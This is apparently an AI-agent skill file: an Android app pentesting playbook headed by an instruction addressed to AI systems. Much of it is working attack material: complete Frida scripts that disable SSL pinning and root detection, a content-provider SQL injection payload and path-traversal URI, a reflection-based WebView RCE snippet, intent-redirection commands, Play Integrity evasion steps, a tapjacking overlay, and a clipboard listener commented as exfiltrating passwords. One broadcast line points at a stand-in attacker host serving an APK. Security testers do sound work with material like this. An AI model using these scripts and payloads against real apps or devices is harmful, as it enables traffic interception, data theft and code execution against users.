android-pentesting-tricks


SKILL: Android Pentesting Tricks — Expert Attack Playbook


AI LOAD INSTRUCTION: Expert Android application security testing techniques. Covers SSL pinning bypass (Frida/Objection/LSPosed), component exposure, WebView exploitation, intent redirection, root detection bypass, and Play Integrity evasion. Base models miss Frida hook specifics and multi-layer bypass chains.

0. RELATED ROUTING


Before going deep, consider loading:
  • mobile-ssl-pinning-bypass for in-depth cross-platform SSL pinning bypass techniques and framework-specific hooks
  • ios-pentesting-tricks when also testing the iOS version of the same app
  • api-sec for backend API security testing once traffic is intercepted

Advanced Reference


Also load FRIDA_SCRIPTS.md when you need:
  • Ready-to-use Frida script templates for common Android testing tasks
  • Detailed hook points for OkHttp, Retrofit, Volley, WebView
  • Root detection bypass script collection


1. SSL PINNING BYPASS


1.1 Frida Universal Bypass


```bash
# Install frida-server on the device. The server version must match the host's
# frida-tools, and it needs root to attach to arbitrary processes (prefix the
# last command with su -c on a rooted device).
adb push frida-server-16.x.x-android-arm64 /data/local/tmp/
adb shell "chmod 755 /data/local/tmp/frida-server-16.x.x-android-arm64"
adb shell "/data/local/tmp/frida-server-16.x.x-android-arm64 &"
```

Universal SSL pinning bypass. Frida 16 resumes a spawned process automatically, so the old `--no-pause` flag no longer exists (use `--pause` for the opposite behaviour):

```bash
frida -U -l ssl_pinning_bypass.js -f com.target.app
```

| Hook Point | Library/Class | Coverage |
|---|---|---|
| `X509TrustManager.checkServerTrusted` (an interface cannot be hooked; hook the Conscrypt implementation `TrustManagerImpl.verifyChain`, Android 7+) | Android SDK | All standard HTTPS |
| `OkHttpClient.Builder.sslSocketFactory` | OkHttp 3.x/4.x | Square OkHttp |
| `CertificatePinner.check` (plus the Kotlin-internal `check$okhttp` in 4.x) | OkHttp 3.x/4.x | OkHttp pinning |
| `HttpsURLConnection.setSSLSocketFactory` | Android SDK | Legacy HTTPS |
| `SSLContext.init` | Android SDK | Custom SSL contexts |
| `WebViewClient.onReceivedSslError` | WebView | WebView SSL errors (subclasses that override it must be hooked by name) |
| `TrustManagerFactory.getTrustManagers` | Android SDK | Factory-created TMs |

These are Java-layer hooks: pinning done in native code (Flutter/BoringSSL, Cronet, custom JNI) is not touched by them; see mobile-ssl-pinning-bypass for those.
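The table names the hook points but not the script that the `frida` command loads. The `ssl_pinning_bypass.js` below is an added example written for this page, not the FRIDA_SCRIPTS.md collection and not a copy of any published script; `com.target.app` is the page's placeholder package, the class name `com.example.frida.TrustAll` is arbitrary, and the Conscrypt hook assumes Android 7 or newer. Each hook point is installed independently and the function returns the list it managed to install, so an app that lacks OkHttp still gets the platform and WebView hooks, and the log tells you which layers were covered.

```javascript
// ssl_pinning_bypass.js: added example for the hook table above, not the
// FRIDA_SCRIPTS.md collection. Every hook point is attempted on its own, so a
// class the app does not ship (OkHttp in a Volley-only app) is skipped instead
// of aborting the script. Run: frida -U -f com.target.app -l ssl_pinning_bypass.js
// Java.use() throws for a class that is not loaded; map that to null.
function tryUse(Java, className) {
  try { return Java.use(className); } catch (e) { return null; }
}
// Replace every overload of cls.methodName with one returning retVal.
// Returns false when the class has no such method (other library version).
function neutralize(cls, methodName, retVal) {
  const method = cls[methodName];
  if (method === undefined) return false;
  method.overloads.forEach(function (ov) {
    ov.implementation = function () { return retVal; };
  });
  return true;
}
// Installs the hooks and returns the names of the hook points installed.
function installSslBypass(Java) {
  const installed = [];
  // SSLContext.init / TrustManagerFactory.getTrustManagers: hand the app a
  // TrustManager that accepts any chain (class name is arbitrary).
  const X509TrustManager = tryUse(Java, 'javax.net.ssl.X509TrustManager');
  const SSLContext = tryUse(Java, 'javax.net.ssl.SSLContext');
  const TrustManagerFactory = tryUse(Java, 'javax.net.ssl.TrustManagerFactory');
  if (X509TrustManager && SSLContext) {
    const TrustAll = Java.registerClass({
      name: 'com.example.frida.TrustAll',
      implements: [X509TrustManager],
      methods: {
        checkClientTrusted: function (chain, authType) {},
        checkServerTrusted: function (chain, authType) {},
        getAcceptedIssuers: function () { return []; },
      },
    });
    const init = SSLContext.init.overload('[Ljavax.net.ssl.KeyManager;',
      '[Ljavax.net.ssl.TrustManager;', 'java.security.SecureRandom');
    init.implementation = function (km, tm, rng) {
      init.call(this, km, [TrustAll.$new()], rng); // the app's TMs are dropped
    };
    installed.push('SSLContext.init');
    if (TrustManagerFactory) {
      TrustManagerFactory.getTrustManagers.implementation = function () {
        return Java.array('javax.net.ssl.TrustManager', [TrustAll.$new()]);
      };
      installed.push('TrustManagerFactory.getTrustManagers');
    }
  }
  // X509TrustManager.checkServerTrusted: an interface cannot be hooked, so hook
  // Conscrypt's implementation (Android 7+) and return the unverified chain.
  const TrustManagerImpl = tryUse(Java, 'com.android.org.conscrypt.TrustManagerImpl');
  if (TrustManagerImpl && TrustManagerImpl.verifyChain !== undefined) {
    TrustManagerImpl.verifyChain.overloads.forEach(function (ov) {
      ov.implementation = function () { return arguments[0]; };
    });
    installed.push('TrustManagerImpl.verifyChain');
  }
  // OkHttp 3.x/4.x: CertificatePinner.check (every overload) plus the 4.x
  // Kotlin-internal check$okhttp. sslSocketFactory() is only logged, because a
  // factory built from an SSLContext is already permissive after the hook above;
  // HttpsURLConnection.setSSLSocketFactory is covered the same way.
  const CertificatePinner = tryUse(Java, 'okhttp3.CertificatePinner');
  if (CertificatePinner) {
    if (neutralize(CertificatePinner, 'check', undefined)) installed.push('CertificatePinner.check');
    if (neutralize(CertificatePinner, 'check$okhttp', undefined)) installed.push('CertificatePinner.check$okhttp');
  }
  const Builder = tryUse(Java, 'okhttp3.OkHttpClient$Builder');
  if (Builder && Builder.sslSocketFactory !== undefined) {
    Builder.sslSocketFactory.overloads.forEach(function (ov) {
      ov.implementation = function () {
        console.log('[ssl] OkHttpClient.Builder.sslSocketFactory(): check for a hand-rolled factory');
        return ov.apply(this, arguments);
      };
    });
    installed.push('OkHttpClient.Builder.sslSocketFactory');
  }
  // WebView: accept TLS errors. Only WebViewClient subclasses that do not
  // override onReceivedSslError are affected; hook overriding ones by name.
  const WebViewClient = tryUse(Java, 'android.webkit.WebViewClient');
  if (WebViewClient) {
    WebViewClient.onReceivedSslError.overload('android.webkit.WebView',
      'android.webkit.SslErrorHandler', 'android.net.http.SslError')
      .implementation = function (view, handler, error) { handler.proceed(); };
    installed.push('WebViewClient.onReceivedSslError');
  }
  return installed;
}
// Entry point under Frida; Java is undefined when the file is loaded elsewhere.
if (typeof Java !== 'undefined') {
  Java.perform(function () {
    installSslBypass(Java).forEach(function (h) { console.log('[ssl] hooked ' + h); });
  });
}
```

If the log shows every hook installed and traffic still fails, the pinning is being done outside these classes (native TLS stack, or a `WebViewClient` subclass with its own `onReceivedSslError`), which is where `Java.enumerateLoadedClasses` and the native hooks come in.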

1.2 Objection (Quick Method)


```bash
objection -g com.target.app explore
```

Inside Objection REPL:


```
android sslpinning disable
```

1.3 Network Security Config (Debug Builds)


If you can modify the APK or it's a debug build. `<debug-overrides>` is honoured only while the app is debuggable; for a repackaged release build put the same `<trust-anchors>` under `<base-config>` instead, since Android 7+ stops trusting user-installed CAs by default. The file must be referenced from the manifest with `android:networkSecurityConfig="@xml/network_security_config"` on `<application>`.

```xml
<!-- res/xml/network_security_config.xml -->
<network-security-config>
  <debug-overrides>
    <trust-anchors>
      <certificates src="user" />  <!-- Trust user-installed CAs -->
    </trust-anchors>
  </debug-overrides>
</network-security-config>
```

1.4 Magisk Module Approach


| Module | Method | Scope |
|---|---|---|
| LSPosed + TrustMeAlready | Hooks the system-wide TrustManager | All apps |
| LSPosed + SSLUnpinning | Targeted SSL bypass | Per-app |
| MagiskTrustUserCerts | Copies user CAs into the system store (needed since Android 7, where apps stop trusting user CAs by default) | All apps trusting system CAs, Android 7–13 |
| ConscryptTrustUserCerts | Injects user CAs into the Conscrypt APEX store, where Android 14 moved the system CAs | Android 14+ |


2. COMPONENT EXPOSURE


2.1 Exported Activities


```bash
# Find exported activities (AndroidManifest.xml via aapt; the grep context shows
# the component name). Note: for apps targeting API < 31 a component with an
# <intent-filter> is exported by default even without android:exported, so
# review every intent-filter as well.
aapt dump xmltree target.apk AndroidManifest.xml | grep -B 5 "exported.*true"

# Launch an exported activity directly
adb shell am start -n com.target.app/.AdminActivity

# Deep-link activity: pass the URI as intent data
adb shell am start -n com.target.app/.DeepLinkActivity \
  -d "target://callback?token=attacker_token"

# With extra data (--es = string extra; use --ei / --ez / --el for int / boolean /
# long, otherwise a getIntExtra() in the app silently falls back to its default)
adb shell am start -n com.target.app/.TransferActivity \
  --es "amount" "99999" --es "recipient" "attacker"
```

2.2 Content Providers


```bash
# Query an exposed content provider
adb shell content query --uri content://com.target.app.provider/users

# SQL injection through the selection (--where) argument
adb shell content query --uri "content://com.target.app.provider/users" \
  --where "1=1) UNION SELECT sql,2,3 FROM sqlite_master--"

# Path traversal in a file-serving content provider. AndroidX FileProvider
# canonicalises the path and rejects this; it works against hand-written
# openFile() implementations that concatenate uri.getPath(). Try percent-encoded
# variants (%2e%2e%2f) when the provider validates before decoding.
adb shell content read --uri "content://com.target.app.fileprovider/../../../../etc/hosts"
```

| Provider Type | Attack Vector | Impact |
|---|---|---|
| Database-backed | SQL injection via `query()` projection/selection | Data leak, auth bypass |
| File-backed | Path traversal via URI | Read arbitrary files |
| Custom Parcelable in `call()`/extras | Type confusion while unparcelling attacker-supplied data | Crash up to code execution |


2.3 Broadcast Receivers


```bash
# Send a crafted broadcast to an exported receiver. If a manifest-declared
# receiver does not react, add -n <package>/<receiver class> to make the
# broadcast explicit (Android 8+ drops implicit broadcasts to manifest receivers).
adb shell am broadcast -a com.target.app.ACTION_UPDATE \
  --es "url" "http://attacker.com/malicious.apk"
```

Ordered broadcast interception: for `sendOrderedBroadcast()` the receiver with the highest `android:priority` on its intent-filter runs first, so a receiver registered with a higher priority than the target's can read the data, rewrite it with `setResultData()`, or swallow it with `abortBroadcast()` before the target ever sees it.

2.4 Exported Services


```bash
# Start an exported service with attacker-controlled extras
# (start-service is the current spelling; older adb accepts startservice)
adb shell am start-service -n com.target.app/.BackgroundService \
  --es "command" "exfiltrate"

# List running services
adb shell dumpsys activity services | grep com.target
```

`am` can only start a service. Binding to an exported service (`bindService()` against its AIDL or Messenger interface) needs a client app that speaks that interface.

---

3. WEBVIEW VULNERABILITIES


3.1 JavaScript Interface RCE (Pre-API 17)


When the app targets API < 17 (or runs on Android below 4.2), every public method of the bridge object is reachable from page JavaScript, including the inherited `getClass()`, which gives reflection and therefore `Runtime.exec`. From API 17 onward only methods annotated with `@JavascriptInterface` are exposed, so the annotation is the fix rather than the cause.

```java
// Vulnerable code: with targetSdkVersion < 17 every public method of
// JSInterface is callable from the page, annotation or not
webView.addJavascriptInterface(new JSInterface(), "android");

// Pre-API 17: reflection-based RCE via injected JavaScript.
// Inject into the WebView (the bridge is reachable as window.android):
// android.getClass().forName('java.lang.Runtime')
//   .getMethod('getRuntime', null).invoke(null, null).exec('id')
```

3.2 Modern WebView Attacks


| Vulnerability | Condition | Exploit |
|---|---|---|
| `setJavaScriptEnabled(true)` + untrusted content | JS enabled and attacker controls the loaded URL | XSS → bridge access |
| `setAllowFileAccessFromFileURLs(true)` | `file://` pages can read other `file://` resources | Load `file:///data/data/com.target/...` |
| `setAllowUniversalAccessFromFileURLs(true)` | `file://` pages can access any origin | Exfiltrate via XHR to attacker |
| `loadUrl(user_controlled)` | User input reaches `loadUrl` | `javascript:` scheme or `file://` |
| `shouldOverrideUrlLoading` bypass | Incomplete URL validation | Redirect to attacker-controlled page |
| `evaluateJavascript` with tainted data | User data concatenated into executed JS | XSS in WebView context |

The two `file://` settings default to false from API 16, and `setAllowFileAccess` defaults to false for apps targeting API 30+, so the `file://` rows apply only where the app opts in explicitly.

3.3 Deep Link to WebView Chain


1. Attacker crafts deep link: target://webview?url=https://attacker.com/xss.html
2. App opens WebView with attacker URL
3. XSS in WebView calls JavaScript bridge: android.sensitiveMethod()
4. Bridge executes in app context with app's permissions
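Confirming the table above and the deep-link chain at runtime is mostly a matter of seeing what the app does with the URL it was handed. The `webview_audit.js` below is an added example written for this page (not the FRIDA_SCRIPTS.md hook list and not the app's code); it assumes the page's `com.target.app` placeholder and the stock `android.webkit` classes, and the `classifyUrl` risk labels are this example's own naming. It bypasses nothing: it logs which risky `WebSettings` the app turns on, which methods of every bridge object a page can call (and whether they carry `@JavascriptInterface`), and which URL string actually reaches `loadUrl()` or `shouldOverrideUrlLoading()` after you fire the deep link from step 1.

```javascript
// webview_audit.js: added example for the table above and the deep-link chain
// in 3.3, not the FRIDA_SCRIPTS.md hook list. It bypasses nothing: it makes the
// app report which risky settings it enables, which bridge methods a page can
// call, and which URL string reaches loadUrl(), so the deep link -> WebView ->
// bridge chain can be confirmed from the log. Run: frida -U -f com.target.app -l webview_audit.js
function tryUse(Java, className) {
  try { return Java.use(className); } catch (e) { return null; }
}
// Risk label for a URL handed to loadUrl(); pure so it also works offline.
function classifyUrl(url) {
  const u = String(url).trim().toLowerCase();
  if (u.startsWith('javascript:')) return 'script-injection';
  if (u.startsWith('file://')) return 'local-file';
  if (u.startsWith('content://')) return 'content-provider';
  if (u.startsWith('http://')) return 'cleartext';
  if (u.startsWith('https://')) return 'remote';
  return 'other';
}
// WebSettings setters whose true value widens the attack surface.
const RISKY_SETTINGS = {
  setJavaScriptEnabled: 'XSS in loaded content reaches every bridge method',
  setAllowFileAccess: 'file:// URLs can be loaded (default false from API 30)',
  setAllowFileAccessFromFileURLs: 'file:// pages can read other local files',
  setAllowUniversalAccessFromFileURLs: 'file:// pages can reach any origin (exfil via XHR)',
  setAllowContentAccess: 'content:// URLs can be loaded',
};
// Installs the hooks; log() receives one line per finding. Returns the hook
// points installed, so an app with no WebView classes simply yields none.
function installWebViewAudit(Java, log) {
  const installed = [];
  const WebSettings = tryUse(Java, 'android.webkit.WebSettings');
  const WebView = tryUse(Java, 'android.webkit.WebView');
  const WebViewClient = tryUse(Java, 'android.webkit.WebViewClient');
  const JsInterface = tryUse(Java, 'android.webkit.JavascriptInterface');
  if (WebSettings) {
    Object.keys(RISKY_SETTINGS).forEach(function (name) {
      if (WebSettings[name] === undefined) return;
      WebSettings[name].overload('boolean').implementation = function (enabled) {
        if (enabled) log('[webview] ' + name + '(true): ' + RISKY_SETTINGS[name]);
        return this[name](enabled);
      };
      installed.push('WebSettings.' + name);
    });
  }
  if (WebView) {
    // Bridge objects: list each declared method and whether it carries
    // @JavascriptInterface (below targetSdk 17 every public method is callable).
    WebView.addJavascriptInterface.overload('java.lang.Object', 'java.lang.String')
      .implementation = function (obj, name) {
        obj.getClass().getDeclaredMethods().forEach(function (m) {
          const tagged = JsInterface !== null && m.isAnnotationPresent(JsInterface.class);
          log('[webview] bridge ' + name + '.' + m.getName() + (tagged ? ' (@JavascriptInterface)' : ' (not annotated)'));
        });
        return this.addJavascriptInterface(obj, name);
      };
    installed.push('WebView.addJavascriptInterface');
    // Every URL reaching loadUrl(): after firing a deep link this shows whether
    // the attacker-supplied URL arrived unchanged.
    WebView.loadUrl.overloads.forEach(function (ov) {
      ov.implementation = function (url) {
        log('[webview] loadUrl ' + classifyUrl(url) + ': ' + url);
        return ov.apply(this, arguments);
      };
    });
    installed.push('WebView.loadUrl');
    WebView.evaluateJavascript.implementation = function (script, callback) {
      log('[webview] evaluateJavascript: ' + String(script).slice(0, 200));
      return this.evaluateJavascript(script, callback);
    };
    installed.push('WebView.evaluateJavascript');
  }
  if (WebViewClient) {
    // Result true = the app handled the navigation itself; false = WebView loads it.
    WebViewClient.shouldOverrideUrlLoading.overloads.forEach(function (ov) {
      ov.implementation = function (view, request) {
        const handled = ov.apply(this, arguments);
        const url = (request !== null && typeof request.getUrl === 'function')
          ? request.getUrl().toString() : String(request);
        log('[webview] shouldOverrideUrlLoading ' + url + ' -> ' + (handled ? 'handled by app' : 'loaded'));
        return handled;
      };
    });
    installed.push('WebViewClient.shouldOverrideUrlLoading');
  }
  return installed;
}
if (typeof Java !== 'undefined') {
  Java.perform(function () {
    installWebViewAudit(Java, console.log).forEach(function (h) { console.log('[webview] hooked ' + h); });
  });
}
```

A `loadUrl remote: https://attacker.com/xss.html` line following the deep link, next to a `bridge android.sensitiveMethod (@JavascriptInterface)` line, is the whole chain in two log entries; a `shouldOverrideUrlLoading ... -> loaded` entry for the same URL shows the validation in step 2 did not stop it.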


4. INTENT REDIRECTION


An exported activity receives an Intent and starts another (internal) activity using data from the received Intent. Because `startActivity()` runs with the vulnerable app's identity, the export check on the inner component is bypassed, and any URI permission grant flags on the forwarded Intent are granted as that app too, which exposes its non-exported content providers.

```java
// Vulnerable pattern:
Intent received = getIntent();
Intent redirect = (Intent) received.getParcelableExtra("next_intent");
startActivity(redirect);
// Attacker controls "next_intent" → can start any internal activity
```

Exploit: start a non-exported internal activity via redirection. `am` has no flag for a Parcelable Intent extra, so the `getParcelableExtra` pattern above needs a small PoC app that calls `outer.putExtra("next_intent", innerIntent)` and starts `ExportedActivity`; the intent-URI string below works only when the app reads a string extra and parses it with `Intent.parseUri()`.

```bash
adb shell am start -n com.target.app/.ExportedActivity \
  --es "next_intent" "intent:#Intent;component=com.target.app/.InternalAdminActivity;end"
```

| Pattern | Indicator | Risk |
|---|---|---|
| `getParcelableExtra` → `startActivity` | Intent-in-Intent | Start non-exported activities |
| `getStringExtra("url")` → `startActivity(Intent.ACTION_VIEW)` | URL forwarding | Open arbitrary URLs |
| `getStringExtra("class")` → `Class.forName` → `startActivity` | Dynamic class loading | Start any activity by name |

---

5. ROOT DETECTION BYPASS


5.1 Common Root Detection Checks


| Check | What It Detects | Frida Bypass |
|---|---|---|
| `su` binary exists | `/system/xbin/su`, `/sbin/su` | Hook `File.exists()` → return false for those paths |
| Build tags contain "test-keys" | `Build.TAGS` | Static field: set `Build.TAGS.value` = "release-keys" |
| Magisk Manager installed | Package name check | Hook `PackageManager.getPackageInfo` → throw `NameNotFoundException` |
| Superuser.apk present | Su management app | Hook `File.exists()` |
| RootBeer library | Multi-check root detection | Hook all RootBeer check methods → return false |
| SafetyNet/Play Integrity | Server-side attestation | Not hookable client-side; requires Magisk DenyList + module (§6) |
| Abnormal system properties | `ro.debuggable=1`, `ro.secure=0`, etc. | Hook `SystemProperties.get` |

All of these are Java-layer hooks. A check done in native code (a JNI `stat()`/`access()` on the same paths) needs `Interceptor.attach` on the libc symbol instead.
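The table's right-hand column, written out as one script. `root_bypass.js` below is an added example for this page, not the FRIDA_SCRIPTS.md collection; it assumes the page's `com.target.app` placeholder, the RootBeer package `com.scottyab.rootbeer`, and the common su/Magisk paths and package names listed at the top, which you extend after reading the target's own decompiled checks. Each check is answered the way an unrooted production build would answer it, and the function returns which hooks it installed so a RootBeer-free app (or an older RootBeer without `checkForMagiskBinary`) is handled rather than crashing the script.

```javascript
// root_bypass.js: added example for the table above (not the FRIDA_SCRIPTS.md
// collection). Each Java-level check in the table is answered the way an
// unrooted device would answer it. Native checks (JNI stat()/access() on the
// same paths) are not covered; those need Interceptor.attach on libc.
// Run: frida -U -f com.target.app -l root_bypass.js
function tryUse(Java, className) {
  try { return Java.use(className); } catch (e) { return null; }
}
// Indicators the common checks (su, Superuser.apk, Magisk, RootBeer) look for.
// Extend per target after reading its decompiled checks.
const ROOT_PATHS = ['/system/xbin/su', '/system/bin/su', '/sbin/su', '/su/bin/su',
  '/system/app/Superuser.apk', '/sbin/.magisk', '/data/adb/magisk', '/data/adb/modules'];
const ROOT_BASENAMES = ['su', 'magisk', 'busybox', 'Superuser.apk', '.magisk'];
const ROOT_PACKAGES = ['com.topjohnwu.magisk', 'eu.chainfire.supersu',
  'com.noshufou.android.su', 'com.koushikdutta.superuser'];
// Property values an unrooted production build reports.
const CLEAN_PROPS = { 'ro.debuggable': '0', 'ro.secure': '1',
  'ro.build.tags': 'release-keys', 'ro.build.type': 'user' };
// Pure helpers the hooks delegate to.
function isRootIndicatorPath(path) {
  const p = String(path);
  const base = p.slice(p.lastIndexOf('/') + 1);
  return ROOT_PATHS.indexOf(p) !== -1 || ROOT_BASENAMES.indexOf(base) !== -1;
}
function cleanProp(key, actual) {
  return Object.prototype.hasOwnProperty.call(CLEAN_PROPS, key) ? CLEAN_PROPS[key] : actual;
}
// Force every overload of cls.name to return retVal; false if no such method
// (e.g. an older RootBeer without checkForMagiskBinary).
function forceReturn(cls, name, retVal) {
  const m = cls[name];
  if (m === undefined) return false;
  m.overloads.forEach(function (ov) { ov.implementation = function () { return retVal; }; });
  return true;
}
function installRootBypass(Java) {
  const installed = [];
  // su binary / Superuser.apk / Magisk paths
  const File = tryUse(Java, 'java.io.File');
  if (File) {
    File.exists.implementation = function () {
      return isRootIndicatorPath(this.getPath()) ? false : this.exists();
    };
    installed.push('File.exists');
  }
  // Build.TAGS is a static field, not a method: overwrite its value.
  const Build = tryUse(Java, 'android.os.Build');
  if (Build) {
    Build.TAGS.value = 'release-keys';
    installed.push('Build.TAGS');
  }
  // Root-management app lookups: behave as if the package is not installed.
  const PM = tryUse(Java, 'android.app.ApplicationPackageManager');
  const NotFound = tryUse(Java, 'android.content.pm.PackageManager$NameNotFoundException');
  if (PM && NotFound) {
    PM.getPackageInfo.overload('java.lang.String', 'int').implementation = function (pkg, flags) {
      if (ROOT_PACKAGES.indexOf(pkg) !== -1) throw NotFound.$new(pkg);
      return this.getPackageInfo(pkg, flags);
    };
    installed.push('PackageManager.getPackageInfo');
  }
  // ro.debuggable, ro.secure, build tags/type read through SystemProperties
  const SystemProperties = tryUse(Java, 'android.os.SystemProperties');
  if (SystemProperties) {
    SystemProperties.get.overloads.forEach(function (ov) {
      ov.implementation = function (key) { return cleanProp(key, ov.apply(this, arguments)); };
    });
    installed.push('SystemProperties.get');
  }
  // RootBeer: every public check returns "clean".
  const RootBeer = tryUse(Java, 'com.scottyab.rootbeer.RootBeer');
  if (RootBeer) {
    ['isRooted', 'isRootedWithBusyBoxCheck', 'detectRootManagementApps',
     'detectPotentiallyDangerousApps', 'detectRootCloakingApps', 'detectTestKeys',
     'checkForBusyBoxBinary', 'checkForSuBinary', 'checkSuExists', 'checkForRWPaths',
     'checkForDangerousProps', 'checkForRootNative', 'checkForMagiskBinary'
    ].forEach(function (name) {
      if (forceReturn(RootBeer, name, false)) installed.push('RootBeer.' + name);
    });
  }
  return installed;
}
if (typeof Java !== 'undefined') {
  Java.perform(function () {
    installRootBypass(Java).forEach(function (h) { console.log('[root] hooked ' + h); });
  });
}
```

The hooks are installed before the app's `onCreate` runs when you spawn with `-f`, which matters because most root checks fire once at startup; attaching to a running process with `-n` is too late for those.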

5.2 Magisk DenyList (Previously MagiskHide)


  • Enable DenyList in the Magisk app (Settings → Configure DenyList) and add the target app; Magisk then hides itself from that process
  • Covers: su binary, Magisk app package, mount points, props
  • DenyList is the basic hide; apps that look for Zygisk or Magisk's mount namespace need Shamiko or a similar module on top (§6)


---

6. PLAY INTEGRITY / SAFETYNET BYPASS


| Level | What It Checks | Bypass Difficulty |
|---|---|---|
| Basic Integrity | Not rooted, not an emulator | Easy (Magisk + DenyList) |
| Device Integrity | Google-certified device, locked bootloader, verified boot | Achievable on a rooted device with a spoofed certified fingerprint (PIF), but fragile: Google revokes abused fingerprints, so the module needs regular updates |
| Strong Integrity | Hardware-backed key attestation from the TEE | Very hard (needs a valid attestation chain; fingerprint spoofing does not help) |

Techniques:
  • Magisk with Zygisk enabled + DenyList for target app
  • Play Integrity Fix (PIF) Magisk module: spoofs device fingerprint
  • Shamiko module: hides root from specific apps
  • Custom ROM with locked bootloader (Pixel-specific tricks); re-locking restores verified boot but not Google certification, so this helps with Basic rather than Device Integrity


7. TAPJACKING (OVERLAY ATTACKS)


```xml
<!-- Malicious overlay activity -->
<activity android:name=".OverlayActivity"
    android:theme="@style/TransparentTheme"
    android:excludeFromRecents="true">
</activity>

<!-- Requires SYSTEM_ALERT_WINDOW permission (draw over other apps) -->
```

| Android Version | Protection | Bypass |
|---|---|---|
| Pre-6.0 | `SYSTEM_ALERT_WINDOW` granted at install time; `filterTouchesWhenObscured` exists (API 9+) but is opt-in per view | Full overlay |
| 6.0–11 | `SYSTEM_ALERT_WINDOW` must be granted by the user in Settings; touch filtering still opt-in (`android:filterTouchesWhenObscured` / `onFilterTouchEventForSecurity`) | Apps not using it are vulnerable once the permission is granted |
| 12+ | Untrusted touches that pass through another app's overlay are blocked when the overlay is more opaque than the system threshold (0.8) | Translucent (alpha ≤ 0.8) or partial overlays, timing-based |


8. BACKUP EXTRACTION


```bash
# Check if backup is allowed (allowBackup is true when the attribute is absent)
aapt dump xmltree target.apk AndroidManifest.xml | grep allowBackup
# android:allowBackup(0x01010280)=(type 0x12)0xffffffff → true (default!)

# Extract backup. On Android 12+ adb backup no longer includes app data for
# apps targeting API 31+, so this path is for older targets.
adb backup -f backup.ab -apk com.target.app

# Convert to tar: skip the 24-byte "ANDROID BACKUP" header and inflate the zlib
# stream (openssl must be built with zlib support; any zlib inflater works).
# A password-protected backup has to be decrypted first, e.g. with
# android-backup-extractor.
dd if=backup.ab bs=24 skip=1 | openssl zlib -d > backup.tar
tar xf backup.tar

# Analyze extracted data. The tar unpacks to apps/<package>/ with sp/ holding
# shared_prefs and db/ holding databases.
find apps/com.target.app -name "*.db" -o -name "*.xml" -o -name "*.json"
# Check sp/ (shared_prefs) for tokens, credentials
# Check db/ (databases) for SQLite DBs with sensitive data
```


---

9. ADDITIONAL TRICKS


9.1 Debuggable App Exploitation


```bash
# If android:debuggable="true" in the manifest, run-as switches to the app's UID
adb shell run-as com.target.app

# Now running as the app's user (inside the run-as shell): full data directory access
cat /data/data/com.target.app/shared_prefs/*.xml
```

9.2 Drozer (Component Testing Framework)


```text
# Inside the drozer console (agent running on the device)

# List attack surface (sample output below)
dz> run app.package.attacksurface com.target.app
  Exported Activities: 3
  Exported Services: 1
  Exported Providers: 2

# Query provider
dz> run app.provider.query content://com.target.app.provider/users

# Scan for injection
dz> run scanner.provider.injection -a com.target.app
```

9.3 Clipboard Sniffing


Android 9 and below only: from Android 10 the clipboard is readable only by the foreground app and the default IME, and Android 12+ shows a toast whenever an app reads it.

```java
import android.content.ClipData;
import android.content.ClipboardManager;

// Pre-Android 10: any app can read the clipboard
ClipboardManager cm = (ClipboardManager) getSystemService(CLIPBOARD_SERVICE);
cm.addPrimaryClipChangedListener(() -> {
    ClipData data = cm.getPrimaryClip();
    // Exfiltrate copied passwords, tokens, etc.
});
```

10. ANDROID PENTESTING DECISION TREE


Testing Android application
├── Can intercept HTTPS traffic?
│   ├── No → SSL pinning in place
│   │   ├── Frida available? → universal SSL bypass script (§1.1)
│   │   ├── Rooted + Magisk? → LSPosed + TrustMeAlready (§1.4)
│   │   ├── Debug build? → Network Security Config (§1.3)
│   │   └── None above? → manual decompile + patch + repackage
│   └── Yes → proceed to traffic analysis
├── Exported components found?
│   ├── Exported Activities → test direct launch, deeplink abuse (§2.1)
│   ├── Content Providers → SQLi, path traversal (§2.2)
│   ├── Broadcast Receivers → crafted intent injection (§2.3)
│   └── Services → unauthorized service binding (§2.4)
├── WebView present?
│   ├── JavaScript enabled + JS interface? → bridge exploitation (§3.1)
│   ├── File access enabled? → file:// scheme abuse (§3.2)
│   └── Deep link → WebView? → URL injection chain (§3.3)
├── Intent handling found?
│   └── Intent-in-Intent pattern? → redirect to internal activity (§4)
├── Root detection blocking testing?
│   ├── Client-side checks only? → Frida hook bypass (§5.1)
│   ├── SafetyNet/Play Integrity? → Magisk DenyList + modules (§6)
│   └── Custom obfuscated checks? → reverse engineer + targeted hooks
├── Sensitive data storage?
│   ├── allowBackup=true? → ADB backup extraction (§8)
│   ├── Debuggable? → run-as for direct data access (§9.1)
│   └── SharedPreferences → check for plaintext tokens/credentials
└── UI-based attacks applicable?
    └── Overlay possible? → tapjacking (§7)